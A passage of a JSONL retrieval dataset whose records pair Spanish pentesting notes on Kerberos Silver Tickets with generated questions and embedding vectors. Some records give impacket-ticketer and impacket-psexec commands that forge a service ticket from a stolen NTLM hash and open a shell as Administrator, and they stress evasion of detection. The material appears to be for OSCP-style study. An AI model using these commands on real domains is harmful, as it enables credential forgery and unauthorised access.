-0.02519, -0.02256, -0.00396, -0.00604, -0.02542, 0.0641, -0.02701, -0.00388, 0.1379, -0.05075, -0.04918, 0.08497, 0.0288, -0.03892, 0.02734, -0.10248, 0.0669, -0.03054, -0.02939, 0.04289, -0.02881, -0.0645, -0.03258, 0.02185, 0.11398, 0.0152, 0.0704, 0.07994, -0.02919, -0.02864, -0.01642, 0.00597, -0.07617, 0.04881, -0.07352, 0.04993, 0.02356, 0.02508, -0.02746, -0.03682, 0.00574, 0.02623, 0.00506, -0.00329, -0.01221, -0.0544, 0.04718, 0.07004, 0.01557, -0.00818, -0.0318, -0.01053, -0.00416, -0.00372, -0.06069, -0.04661, 0.05798, -0.03757, 0.03017, 0.10269, 0.04119, -0.03307, 0.02264, 0.03839, 0.09042, 0.04819, -0.03403, 0.10435, -0.01978, -0.04047, -0.00783, -0.03555, 0.02788, 0.04814, 0.10296, 0.01963, 0.03476, 0.03486, 0.0209, 0.05714, -0.10984, -0.00657, 0.00537, 0.02591, 0.07693, 0.02986, -0.00314, -0.00556, -0.01255, 0.02842, -0.02139, 0.02543, -0.05024, -0.0551, 0.00875, -0.0018, 0.09303, -0.0019, 0.0444, -0.0088, 0.02157, -0.03107, 0.0263, 0.03109, -0.00657, 0.0099, 0.04955, 0.0367, -0.01935, -0.0093, 0.05793]} +{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Silver Ticket\n\n> Forjas un **TGS** para **un servicio concreto** usando el hash NTLM de **esa cuenta de servicio** (no del krbtgt). MΓ‘s sigiloso que el Golden Ticket: **no habla con el DC**. Fuente: oscp.trastero.org/activedirectory.", "indexar": "cual es la diferencia entre forjar un TGS y uno de Golden Ticket?", "v": [-0.1984, -0.16195, 0.03388, 0.10821, 0.01661, 0.05832, -0.07465, 0.04563, 0.07477, 0.08314, -0.01991, 0.06359, -0.08549, 0.14994, 0.09055, -0.02929, 0.07332, -0.10148, 0.08603, 0.04971, 0.03511, 0.05397, 0.12578, -0.2561, 0.0276, -0.06494, 0.06425, -0.10971, -0.04722, 0.06722, 0.10929, -0.15438, -0.11307, -0.20864, -0.10432, -0.01583, 0.02077, 0.13976, 0.02497, -0.07373, 0.00333, -0.00201, 0.05174, 0.04191, 0.11755, -0.12621, 0.06621, 0.16047, -0.08622, -0.11418, -0.05474, 0.0951, -0.00119, -0.07172, -0.03116, -0.04461, 0.07069, 0.02916, -0.10276, 0.06157, -0.06812, -0.15095, -0.06222, -0.0136, -0.07322, -0.04013, -0.01846, -0.00726, 0.01081, -0.04495, -0.04045, 0.07139, -0.01076, 0.01017, 0.08965, -0.00207, 0.07351, 0.06793, 0.00724, 0.06254, 0.09329, -0.00218, -0.0074, 0.1405, 0.04037, -0.03964, 0.04757, -0.06358, -0.06888, 0.02944, -0.04947, 0.0627, -0.0128, 0.02813, 0.00533, -0.12467, -0.01497, -0.02634, -0.03945, 0.04824, 0.04632, 0.013, -0.05386, 0.07308, -0.05643, 0.07416, -0.00448, -0.05217, -0.06225, -0.01288, -0.02143, 0.0808, -0.07309, 0.04612, -0.04778, 0.02038, 0.02351, 0.01795, 0.08251, -0.03547, 0.00767, -0.04845, -0.0634, -0.06973, 0.05476, 0.08065, -0.02518, 0.02575, -0.02393, 0.05366, -0.03596, 0.11697, -0.06137, -0.0029, 0.03779, -0.00108, -0.00272, -0.09165, 0.05154, 0.08086, 0.06616, -0.01287, 0.04721, -0.01751, 0.06265, -0.05945, -0.02994, -0.0149, -0.08125, 0.01039, -0.0096, -0.03746, 0.00113, 0.05164, -0.02215, -0.00639, -0.05181, -0.05305, -0.0519, 0.02193, -0.02166, 0.05327, -0.0144, -0.03822, -0.00438, -0.01926, -0.08656, -0.00739, 0.01375, -0.02055, 0.05124, -0.01622, -0.01496, 0.02876, -0.03796, -0.07162, -0.07628, -0.06198, 0.03565, -0.04256, 0.05744, 0.01116, -0.08879, 0.01351, -0.0145, 0.02275, -0.06008, -0.03926, -0.0008, 0.01977, -0.02283, -0.00761, 0.02823, 0.03391, -0.01461, -0.08091, 0.04897, -0.09205, 0.05538, -0.0123, -0.044, -0.03298, -0.02765, 0.00979, 0.08845, -0.0001, -0.026, 0.04818, -0.00349, 0.07083, 0.05026, -0.02437, 0.05636, -0.04175, -0.04469, -0.00106, 0.01992, 0.01139, -0.01206, 0.0219, 0.04922, -0.00384, 0.04786, -0.01412, -0.03892, -0.02922, 0.03442, 0.00232, 0.03267, 0.0714, 0.0492, 0.04132, 0.02373, 0.02444, 0.0539, 0.08998, 0.04075, -0.06235, -0.03433, -0.00443, 0.04367, 0.06886, -0.00168, 0.05256, 0.04232, 0.00585, -0.04985, 0.0315, 0.02178, -0.02754, -0.04, 0.00607, 0.01014, -0.04649, -0.04553, -0.0115]} +{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Silver Ticket\n\n> Forjas un **TGS** para **un servicio concreto** usando el hash NTLM de **esa cuenta de servicio** (no del krbtgt). MΓ‘s sigiloso que el Golden Ticket: **no habla con el DC**. Fuente: oscp.trastero.org/activedirectory.", "indexar": "con que herramienta consigo crear un TGS para un servicio concreto usando NTLM?", "v": [-0.17533, -0.06972, -0.22134, -0.10044, 0.075, -0.14734, -0.16581, 0.15314, 0.00942, 0.06322, -0.17913, 0.04797, 0.06503, -0.01735, -0.01894, 0.03027, -0.00246, -0.24155, 0.03512, 0.12257, -0.04208, -0.05095, -0.01253, -0.14171, -0.0248, -0.06081, 0.06408, -0.18934, -0.1072, 0.12245, -0.04581, 0.01215, -0.04901, -0.06041, -0.05866, -0.15642, -0.03715, 0.07843, 0.00671, 0.08677, 0.08108, 0.06028, -0.04071, 0.16353, 0.03745, 0.00332, 0.01823, -0.107, -0.02914, -0.05772, -0.05336, -0.06499, -0.1491, -0.12053, -0.09723, -0.07922, 0.19688, -0.13491, -0.04398, -0.04686, -0.05021, -0.04801, -0.0059, -0.0744, -0.0354, -0.07535, 0.01165, -0.03349, -0.02048, -0.03223, -0.12528, -0.00173, 0.07056, -0.11988, 0.06767, -0.00329, 0.0298, 0.02821, -0.0056, -0.01635, 0.04656, -0.01556, -0.07019, -0.04392, -0.11095, -0.03224, 0.01252, 0.01859, 0.02757, -0.04295, -0.00056, 0.09046, -0.06203, 0.0282, 0.0487, 0.00277, 0.07543, -0.0755, 0.05005, -0.02893, 0.14428, -0.03855, -0.03173, 0.04741, -0.0701, 0.01457, -0.00704, -0.00292, -0.08314, 0.0534, 0.10624, 0.03733, 0.0329, -0.01427, 0.00237, 0.05354, -0.0018, -0.07872, -0.01121, -0.04471, 0.04338, -0.00657, 0.01181, -0.01854, -0.01543, 0.03773, -0.04451, 0.05036, -0.10724, -0.01944, 0.02233, -0.01946, -0.10277, 0.03497, -0.02622, -0.00511, 0.01372, -0.09551, 0.00321, -0.06668, 0.06323, 0.05922, -0.03572, -0.03092, 0.0228, 0.00568, -0.01053, -0.06584, 0.00349, 0.02438, 0.09056, -0.03844, -0.00499, -0.00061, -0.05213, -0.0276, -0.01104, -0.00115, -0.12542, 0.05403, -0.02717, 0.01883, 0.04288, 0.04463, -0.03834, -0.05948, 0.03054, -0.00114, 0.06595, -0.00666, -0.00698, -0.04701, 0.04476, -0.03349, 0.02679, -0.06442, -0.00608, -0.03156, -0.03385, -0.08615, -0.0046, -0.0495, -0.02693, -0.02232, -0.00741, -0.04156, -0.02131, -0.01448, -0.02737, -0.01713, -0.01843, 0.0336, 0.04189, -0.06565, 0.01389, -0.02787, 0.02862, -0.07798, 0.02225, -0.03512, -0.05931, 0.0039, 0.00055, -0.05681, 0.00829, 0.02693, 0.00171, 0.06151, -0.00287, 0.01088, 0.04639, -0.00841, 0.04308, -0.04428, 0.01136, 0.03376, 0.0043, 0.00448, -0.02352, -0.00222, -0.03008, -0.05103, 0.00936, 0.00915, -0.00331, -0.02385, 0.02308, -0.01793, 0.00625, 0.00425, 0.02489, -0.03271, 0.02468, -0.01926, 0.00405, -0.0116, 0.03592, 0.01067, -0.05768, -0.00748, 0.03973, 0.05452, -0.02595, 0.01012, -0.02508, -0.01141, -0.02445, 0.01566, -0.04907, -0.06524, 0.00791, -0.016, 0.03346, -0.01062, -0.0112, 0.00997]} +{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Golden vs Silver\n```\nGolden Ticket β†’ hash de krbtgt β†’ TGT β†’ CUALQUIER servicio del dominio (todopoderoso)\nSilver Ticket β†’ hash del servicio (ej. cuenta del SQL/CIFS) β†’ TGS β†’ SOLO ese servicio\n```\nEl Silver no toca el KDC β†’ casi indetectable, pero limitado al servicio.", "indexar": "ΒΏQuΓ© diferencia hay entre un ticket Golden y uno Silver?", "v": [-0.21872, -0.10202, 0.07079, 0.09829, -0.09367, -0.05393, -0.13241, -0.02083, 0.04992, -0.06334, -0.06223, -0.03038, -0.05275, 0.0386, 0.05577, -0.00941, -0.01061, -0.04988, 0.11878, -0.01805, 0.08087, 0.09984, 0.06561, -0.22313, 0.04542, -0.09184, 0.15577, 0.08655, -0.02863, 0.01933, 0.11365, -0.08512, -0.00099, -0.11064, -0.03912, -0.03129, 0.08458, 0.11078, 0.06864, -0.1189, 0.01884, -0.0231, 0.09768, 0.04345, 0.11076, -0.12265, -0.0715, 0.16147, -0.09499, -0.07166, -0.02203, 0.06563, 0.0048, -0.0433, -0.02499, -0.01589, -0.05957, 0.04951, 0.00035, 0.02035, -0.09826, -0.14769, -0.04474, 0.0174, -0.10516, 0.06786, 0.01035, -0.03073, 0.0548, -0.02384, -0.03873, 0.00172, 0.00075, 0.10516, 0.06448, -0.00529, 0.13314, 0.01753, -0.01341, 0.06805, 0.0914, 0.05656, 0.01402, 0.07144, 0.09704, -0.06151, 0.08728, -0.0298, -0.07723, 0.0405, -0.03677, 0.0687, -0.01439, 0.03818, -0.05126, -0.08597, -0.11529, -0.00115, -0.04905, 0.0802, 0.07568, -0.01114, -0.01089, 0.0418, -0.04314, 0.13219, 0.05714, -0.09076, -0.09572, -0.05797, -0.10822, 0.04681, -0.04742, 0.0327, -0.06639, 0.05125, 0.05149, 0.00286, 0.06921, -0.01886, 0.01552, -0.00062, -0.055, -0.06757, 0.04148, 0.02376, -0.01271, 0.07473, 0.04258, 0.09852, -0.03676, 0.05251, -0.06062, -0.03664, 0.0066, 0.03002, 0.01588, -0.05034, 0.07091, 0.08428, 0.06357, -0.03731, 0.00604, -0.0198, 0.00552, -0.08165, 0.00854, -0.065, -0.09958, 0.02414, -0.05823, -0.08221, -0.03429, 0.11332, -0.05432, -0.01507, -0.01511, -0.03652, -0.06543, 0.02842, -0.02585, 0.03298, -0.01368, -0.02062, 0.02657, 0.0419, -0.07801, 0.02237, -0.00451, -0.01812, 0.02264, 0.00465, 0.00886, 0.04226, -0.04045, -0.03707, -0.0759, -0.02599, 0.04146, -0.03341, 0.09013, -0.01353, -0.05122, 0.07576, 0.01166, -0.02066, -0.0012, -0.05879, -0.02108, 0.03995, -0.02038, -0.01503, 0.03216, 0.0528, -0.02048, -0.065, -0.0009, -0.06849, 0.03283, -0.0403, -0.02413, -0.03261, -0.02913, 0.04953, 0.11284, 0.03797, -0.06574, 0.01118, 0.00969, 0.11401, 0.03199, -0.01656, 0.07102, -0.04038, -0.01421, -0.03153, 0.03728, 0.00561, -0.03368, -0.00921, 0.11118, 0.02076, 0.0223, -0.02422, -0.00966, -0.00864, 0.01806, 0.02398, 0.07939, 0.07981, 0.11002, 0.01578, -0.04684, 0.03564, 0.07035, 0.06297, 0.02742, -0.03713, -0.05745, -0.00056, 0.03182, 0.07237, 0.00017, 0.0944, 0.01996, 0.01026, -0.02009, 0.04124, 0.01168, -0.00773, -0.01897, -0.00158, -0.0135, -0.0703, -0.0584, -0.00959]} +{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Golden vs Silver\n```\nGolden Ticket β†’ hash de krbtgt β†’ TGT β†’ CUALQUIER servicio del dominio (todopoderoso)\nSilver Ticket β†’ hash del servicio (ej. cuenta del SQL/CIFS) β†’ TGS β†’ SOLO ese servicio\n```\nEl Silver no toca el KDC β†’ casi indetectable, pero limitado al servicio.", "indexar": "ΒΏCon quΓ© tΓ©cnica puedo obtener acceso a un solo servicio del dominio sin tocar el KDC?", "v": [-0.14621, -0.0081, -0.11396, -0.01247, -0.01908, -0.13041, 0.12189, 0.12224, -0.09383, 0.08002, -0.10774, -0.12474, -0.07637, -0.19928, 0.02638, -0.08476, 0.27409, -0.07915, 0.06321, -0.02266, 0.00117, -0.10941, -0.0203, 0.01761, 0.09882, -0.1156, 0.05311, -0.08189, -0.08669, 0.00835, 0.09848, -0.11076, 0.0624, 0.00353, 0.04891, -0.12537, 0.07598, 0.14695, 0.21357, 0.02724, -0.05128, -0.11859, -0.07959, -0.02699, 0.01806, -0.02819, 0.05971, 0.0043, -0.01811, -0.05609, 0.01477, 0.01653, -0.10839, -0.08442, -0.07066, 0.0359, 0.13097, -0.03251, 0.05851, -0.00833, -0.01919, -0.04399, -0.01617, 0.03079, 0.05499, -0.13143, -0.02508, 0.01932, -0.02053, 0.0488, -0.04095, -0.02683, 0.08469, -0.02166, 0.04598, 0.01425, -0.01654, -0.03221, 0.08358, -0.06743, -0.00153, 0.07883, -0.06766, -0.08231, -0.13558, -0.00858, 0.02512, -0.11114, -0.036, -0.1177, 0.12154, 0.04719, -0.05638, 0.01247, 0.03149, -0.00983, 0.01645, 0.00403, -0.06288, -0.04357, 0.06245, 0.07072, -0.1057, 0.02754, 0.02705, 0.06642, 0.08618, -0.11535, -0.0177, -0.0565, -0.10839, 0.06503, -0.09403, 0.00984, -0.0707, 0.00833, -0.09065, -0.09402, -0.04709, -0.011, -0.03424, -0.04009, 0.10531, -0.06882, 0.0265, -0.00141, -0.03603, -0.02311, -0.01886, -0.07316, 0.08188, -0.0412, -0.01081, -0.05947, 0.03073, 0.00916, 0.07484, -0.03081, -0.00242, -0.00062, 0.04829, 0.0354, -0.05756, -0.02282, 0.02676, -0.05427, 0.07992, -0.12023, -0.07539, -0.06843, -0.03318, -0.01792, -0.01781, 0.05499, -0.02518, 0.01545, -0.01724, -0.03033, -0.01921, 0.02868, -0.05333, 0.05293, -0.03072, -0.00491, -0.04165, 0.01369, 0.01063, -0.05445, 0.0343, 0.05943, -0.12132, 0.02577, -0.0155, -0.00281, -0.02301, -0.00805, -0.01957, -0.07865, 0.04222, -0.0338, 0.01306, -0.02974, 0.00861, 0.00305, -0.00821, 0.07211, -0.01908, -0.05082, 0.01466, 0.02577, 0.03834, -0.00199, -0.05935, 0.00725, 0.0114, -0.07173, -0.01918, 0.01085, -0.03467, -0.01378, -0.02623, -0.02559, -0.00326, -0.0024, 0.06521, -0.01373, 0.02997, 0.00576, -0.06294, 0.0152, -0.0187, -0.03655, 0.05567, -0.04141, -0.00084, 0.03402, -0.06192, 0.02142, -0.03198, -0.00691, -0.05143, 0.05175, 0.0454, -0.02462, 0.02292, -0.00404, 0.05741, 0.00445, 0.06437, 0.08348, -0.01367, 0.03179, -0.02448, 0.01911, 0.0639, 0.0178, 0.0181, -0.02676, -0.04739, 0.00614, 0.0165, 0.02784, 0.02802, -0.00694, -0.03006, -0.06709, -0.09495, 0.02167, -0.06646, -0.02435, 0.0397, 0.00372, 0.02841, -0.01187, 0.00689, -0.00622]} +{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Golden vs Silver\n```\nGolden Ticket β†’ hash de krbtgt β†’ TGT β†’ CUALQUIER servicio del dominio (todopoderoso)\nSilver Ticket β†’ hash del servicio (ej. cuenta del SQL/CIFS) β†’ TGS β†’ SOLO ese servicio\n```\nEl Silver no toca el KDC β†’ casi indetectable, pero limitado al servicio.", "indexar": "ΒΏPor quΓ© se considera mΓ‘s difΓ­cil de detectar que un Golden Ticket?", "v": [-0.26703, 0.05155, -0.00421, 0.00853, -0.05417, 0.04263, 0.03356, 0.06371, 0.04092, -0.0502, 0.05814, 0.14082, -0.17616, 0.07418, 0.09704, -0.02666, -0.05407, -0.12797, 0.13662, -0.05725, 0.00864, -0.03659, 0.08155, -0.2455, 0.06941, -0.12039, 0.03099, 0.03722, 0.00666, 0.00363, 0.01298, -0.18531, -0.01028, -0.07683, -0.10576, 0.01634, 0.02058, 0.06665, 0.04539, 0.03047, 0.1037, -0.00638, 0.08235, -0.00577, 0.12351, -0.08511, -0.05807, 0.07597, -0.1065, -0.03312, -0.05424, 0.06266, 0.00427, -0.05098, 0.05444, 0.01862, -0.08516, 0.01722, 0.04219, -0.05329, -0.06674, -0.03904, -0.00681, 0.09133, -0.08771, 0.02511, 0.04751, 0.00789, -0.0287, -0.05999, -0.01186, -0.06513, 0.01251, 0.14135, 0.1291, 0.02446, 0.13199, 0.01226, 0.02746, -0.03879, 0.10436, 0.02887, 0.03068, 0.08034, 0.03842, -0.07752, 0.0246, -0.01302, -0.02685, -0.05889, -0.04778, -0.00027, 0.06037, -0.00956, 0.02607, -0.02858, 0.03894, -0.03855, -0.14235, 0.05582, 0.01647, -0.14276, -0.00435, 0.02841, -0.09935, 0.06992, -0.00969, -0.06047, -0.06545, -0.11062, -0.08918, 0.0462, -0.08457, -0.0203, -0.04525, 0.07229, 0.08934, 0.03945, -0.05367, -0.01009, 0.02572, 0.00968, -0.04199, -0.11677, 0.00899, 5e-05, 0.02118, 0.02514, 0.02902, 0.00405, -0.08377, 0.07654, -0.00748, -0.01463, -0.07579, 0.08405, 0.00758, -0.13743, 0.0354, 0.10021, -0.00707, -0.06213, -0.02549, -0.0487, 0.06069, -0.04612, -0.05189, 0.00023, -0.05138, 0.01305, -0.05814, -0.07031, -0.00074, 0.05531, -0.04474, 0.01901, 0.05796, -0.06886, -0.05015, 0.02425, -0.07005, 0.02824, -0.06375, 0.02493, 0.06661, 0.04824, -0.00485, 0.05036, 0.01818, 0.03758, 0.02391, -0.02473, -0.00497, -0.05552, -0.03644, -0.01748, 0.00917, -0.08456, 0.06046, -0.03216, 0.00608, -0.00779, -0.01287, 0.00036, -0.00725, 0.02099, 0.02707, -0.03012, 0.03035, 0.0227, 0.06379, 0.00815, 0.05377, 0.08271, 0.00565, -0.07353, 0.02521, -0.07992, -0.01213, -0.04457, -0.01943, -0.04398, -0.00923, 0.07279, 0.05724, -0.01863, -0.06747, 0.04568, 0.02955, 0.04302, 0.01192, 0.01995, 0.09287, -0.03847, -0.01517, -0.01394, -0.03578, 0.03348, -0.07018, 0.01892, 0.05209, 0.03694, 0.03047, -0.01722, -0.02047, -0.02194, -0.0296, 0.00646, 0.16029, 0.0548, 0.09065, -0.01312, -0.01517, 0.06838, 0.02924, -0.02059, 0.03457, -0.04081, -0.06851, 0.01868, 0.05068, 0.07596, 0.0264, 0.06394, 0.02464, -0.01264, 0.01937, 0.03559, 0.0416, -0.01025, -0.04361, 0.01719, 0.04595, -0.05904, 0.03219, -0.0247]} +{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash -domain-sid S-1-5-21-... \\\n -domain corp.local -spn cifs/server.corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@server.corp.local\n```\n- El hash del servicio sale de Mimikatz / secretsdump (la cuenta de mΓ‘quina o de servicio).\n- `-spn` define a quΓ© servicio aplica (`cifs/`, `mssql/`, `http/`, `host/`...).\n\nRelacionado: Golden Ticket Β· Kerberos Β· Pass-the-Hash Β· OSCP MOC", "indexar": "que programa puedo usar para forjar tickets de Kerberos con un hash de servicio?", "v": [-0.0557, -0.0899, -0.13805, -0.1245, -0.03525, -0.17398, -0.06418, 0.04778, 0.01795, -0.06629, -0.16607, -0.03688, -0.02852, -0.04612, 0.0499, 0.03162, 0.02272, -0.03652, 0.13884, 0.11654, 0.04994, 0.15168, -0.07841, -0.02693, -0.14045, 0.07224, 0.04916, -0.06815, -0.18006, -0.00391, -0.06801, -0.09281, -0.03421, -0.07367, -0.01142, 0.00588, -0.01629, 0.18506, 0.05708, 0.05414, 0.02402, 0.04994, 0.03539, 0.09801, 0.01332, -0.01417, 0.01162, -0.02444, -0.03963, -0.1074, 0.08207, -0.06918, -0.18172, 0.04633, 0.02902, -0.14708, -0.04944, -0.11607, -0.20347, -0.0014, -0.03566, -0.07479, -0.08523, 0.00373, 0.02537, -0.1253, 0.05287, 0.01137, -0.06095, 0.00302, -0.10897, 0.11069, 0.08023, 0.06747, 0.01421, 0.12683, -0.01924, -0.07184, 0.06939, 0.02847, -0.01422, 0.00283, 0.07626, 0.10877, -0.07764, -0.04922, 0.08169, -0.06312, 0.0136, 0.04051, 0.01374, 0.13273, 0.07016, 0.03733, 0.04651, -0.11855, 0.02525, 0.02155, -0.02306, -0.01972, 0.0161, -0.05031, -0.02269, 0.12794, -0.07635, 7e-05, 0.09132, -0.00029, -0.01139, 0.03105, 0.02386, -0.01071, -0.08446, -0.06756, -0.1117, 0.02154, 0.01048, 0.00461, 0.04506, 0.02537, -0.05141, 0.03917, 0.05466, -0.09465, 0.14921, -0.00807, -0.02052, 0.10641, -0.02909, -0.01025, 0.0186, 0.09746, -0.07885, -0.02699, 0.00166, -0.03485, 0.00193, -0.03776, 0.02609, 0.04472, 0.06529, 0.08835, -0.01832, 0.02276, 0.07962, -0.00611, -0.04386, 1e-05, -0.01659, -0.05147, 0.07147, -0.00462, 0.00699, 0.06027, -0.03339, -0.0054, 0.05332, -0.06264, -0.07985, 0.02806, -0.08914, -0.03783, 0.00521, 0.04402, 0.06516, -0.04209, -0.01041, -0.01861, 0.05588, 0.1265, -0.01939, 0.05472, 0.07599, -0.03694, 0.03937, -0.02553, -0.06245, -0.03451, -0.02016, -0.03475, 0.00438, -0.05728, 0.02283, -0.003, -0.01808, 0.01123, -0.00021, 0.011, 0.04127, -0.03529, -0.0117, 0.01267, -0.0033, 0.05727, 0.00076, -0.02688, 0.00597, -0.0089, -0.00763, -0.07628, -0.08746, 0.03017, 0.01778, -0.00936, 0.05577, 0.04737, -0.01232, -0.0111, 0.04315, 0.08093, 0.01735, -0.05344, 0.085, -0.00791, -0.0775, -0.00214, 0.03231, -0.00119, 0.04383, 0.0459, 0.01043, 0.01407, 0.00375, 0.03311, 0.02756, -0.0721, 0.02481, 0.00903, 0.04931, 0.03916, -0.01792, 0.00066, -0.00755, -0.00751, -0.00827, -0.03955, 0.02373, -0.01248, -0.04959, -0.05108, -0.01425, 0.112, -0.00726, 0.03132, -0.01995, -0.00499, -0.07578, -0.00935, 0.01375, 0.02755, -0.00586, 0.03049, 0.02702, -0.03956, 0.03775, -0.00965]} +{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash -domain-sid S-1-5-21-... \\\n -domain corp.local -spn cifs/server.corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@server.corp.local\n```\n- El hash del servicio sale de Mimikatz / secretsdump (la cuenta de mΓ‘quina o de servicio).\n- `-spn` define a quΓ© servicio aplica (`cifs/`, `mssql/`, `http/`, `host/`...).\n\nRelacionado: Golden Ticket Β· Kerberos Β· Pass-the-Hash Β· OSCP MOC", "indexar": "cual es una herramienta para crear Golden Tickets usando un hash extraido de Mimikatz?", "v": [-0.14974, -0.02735, -0.0714, -0.00816, -0.02967, -0.06524, -0.27893, 0.04144, -0.09748, -0.05032, -0.047, -0.00119, -0.08109, 0.04631, 0.09031, -0.03461, 0.13419, -0.09489, 0.05114, 0.01163, 0.02808, 0.10598, -0.06986, -0.13654, -0.02724, -0.11064, 0.11149, 0.04951, -0.22066, 0.09879, 0.09684, -0.05825, -0.15717, -0.0585, -0.10844, -0.11847, 0.03522, 0.09457, 0.00641, 0.03886, -0.0046, 0.11898, -0.0695, 0.09718, 0.05191, -0.06193, 0.08786, 0.05649, 0.00504, 0.08127, 0.02464, -0.05994, -0.20479, -0.02371, 0.05615, -0.1835, 0.03529, -0.13441, -0.20291, 0.03786, -0.07635, -0.12526, -0.02543, 0.0098, -0.09267, -0.0274, -0.02037, 0.02122, -0.04292, 0.09265, -0.01689, 0.051, 0.0676, 0.00641, 0.09673, 0.03716, 0.05059, -0.03038, 0.00801, 0.05029, 0.00921, -0.01196, 0.0012, 0.04594, -0.0169, -0.07621, 0.06133, -0.05916, -0.02847, -0.00829, -0.10486, 0.02247, 0.03173, -0.0423, -0.04122, -0.05141, 0.02723, -0.06326, -0.08936, 0.07341, 0.06662, -0.05128, -0.1143, 0.09588, -0.05056, -0.0008, -0.03119, -0.03364, -0.04514, 0.01261, 0.00154, 0.01498, -0.03653, -0.00202, -0.00745, 0.06765, 0.07216, -0.00417, 0.02722, -0.08406, 0.11066, 0.03827, -0.04255, -0.06069, 0.01155, -0.03687, -0.06773, 0.03599, -0.01292, -0.06021, -0.00719, 0.01134, -0.0395, -0.03003, 0.03305, 0.01824, 0.06804, -0.09828, 0.00959, 0.00242, 0.00687, -0.0536, -0.00649, -0.03865, 0.06531, 0.00143, -0.07622, 0.01221, -0.01567, 0.00181, -0.02025, -0.05666, 0.01713, 0.0476, -0.11453, 0.03492, -0.03186, 0.02516, -0.15334, -0.00723, -0.01604, -0.02213, 0.01011, 0.03075, 0.01512, -0.00468, 0.00109, 0.03495, -0.00781, 0.01234, 0.06678, -0.02733, 0.06312, 0.01362, 0.00737, -0.07441, -0.0865, 0.01276, 0.02613, -0.0692, 0.07139, -0.00894, -0.00772, 0.01172, -0.02452, -0.05918, 0.05718, 0.01889, 0.04664, -0.00629, -0.05223, 0.0291, 0.03628, -0.01084, 0.01456, -0.02885, 0.03209, -0.11049, 0.02143, -0.07007, -0.00347, 0.02266, -0.01563, -0.02944, 0.08421, 0.00406, -0.05334, -0.04608, 0.00956, 0.04475, 0.04607, 0.02182, 0.06931, 0.01213, 0.01748, 0.00386, -0.01932, -0.00802, -0.01918, -0.06878, 0.03329, 0.02046, 0.02909, 0.01825, -0.01763, 0.04211, 0.01165, 0.02356, 0.02, 0.00327, 0.05497, -0.0407, 0.00117, 0.03266, 0.03731, -0.05709, 0.02066, -0.00275, -0.07367, 0.01777, 0.00503, 0.05281, 0.01184, 0.03629, 0.01648, 0.01133, -0.01081, 0.05606, -0.01161, -0.05929, -0.00021, 0.00524, 0.04554, -0.05838, 0.02762, -0.01326]} +{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash -domain-sid S-1-5-21-... \\\n -domain corp.local -spn cifs/server.corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@server.corp.local\n```\n- El hash del servicio sale de Mimikatz / secretsdump (la cuenta de mΓ‘quina o de servicio).\n- `-spn` define a quΓ© servicio aplica (`cifs/`, `mssql/`, `http/`, `host/`...).\n\nRelacionado: Golden Ticket Β· Kerberos Β· Pass-the-Hash Β· OSCP MOC", "indexar": "con que puedo generar tickets pas-the-hash especificos para servicios como CIFS o SQL Server?", "v": [-0.12735, -0.12004, -0.07241, -0.07561, -0.03528, -0.36666, -0.078, -0.15995, 0.03196, 0.10982, -0.14441, 0.01127, -0.02274, -0.07051, 0.08916, 0.06833, 0.06718, -0.11839, -0.02621, 0.0936, 0.0324, -0.01137, 0.00317, -0.06149, -0.02577, -0.00105, 0.06506, -0.02483, -0.18148, -0.04177, 0.05131, -0.09557, -0.05385, 0.05443, 0.00932, 0.03115, -0.0913, 0.17125, -0.07443, -0.08292, 0.02075, 0.04456, -0.13055, 0.06646, 0.10182, -0.15784, 0.00998, 0.00428, 0.04046, -0.06563, 0.02282, -0.07989, -0.27423, -0.01478, -0.04191, -0.0655, -0.03489, -0.05206, -0.02062, -0.01781, -0.10805, -0.0156, -0.0487, 0.03107, 0.05061, 0.01875, 0.05404, 0.01665, 0.02092, 0.01754, -0.15873, 0.04224, 0.04627, -0.06694, 0.0713, 0.02802, 0.07817, 0.01485, 0.11319, 0.03822, -0.04387, 0.01994, -0.0214, 0.04629, -0.01162, 0.01389, 0.04086, -0.0054, 0.02221, 0.03132, 0.0881, 0.04713, 0.02213, -0.001, -0.05744, -0.0631, 0.01196, -0.03964, -0.07384, -0.03329, -0.03937, 0.00104, -0.01362, 0.15721, 0.02651, 0.04103, 0.17506, -0.00564, -0.01469, 0.00822, 0.06759, -0.05771, -0.02753, -0.03106, 0.01848, -0.01979, 0.07725, 0.0492, 0.04808, 0.15872, -0.00968, -0.05347, 0.05705, -0.02487, 0.00343, -0.03717, -0.04053, 0.02199, -0.02009, -0.01057, -0.02413, 0.0183, -0.10173, -0.01463, 0.00185, 0.00497, -0.00062, -0.04344, 0.01733, -0.02903, 0.03544, 0.03548, -0.04364, 0.02774, 0.09647, -0.0121, -0.04861, 0.00479, 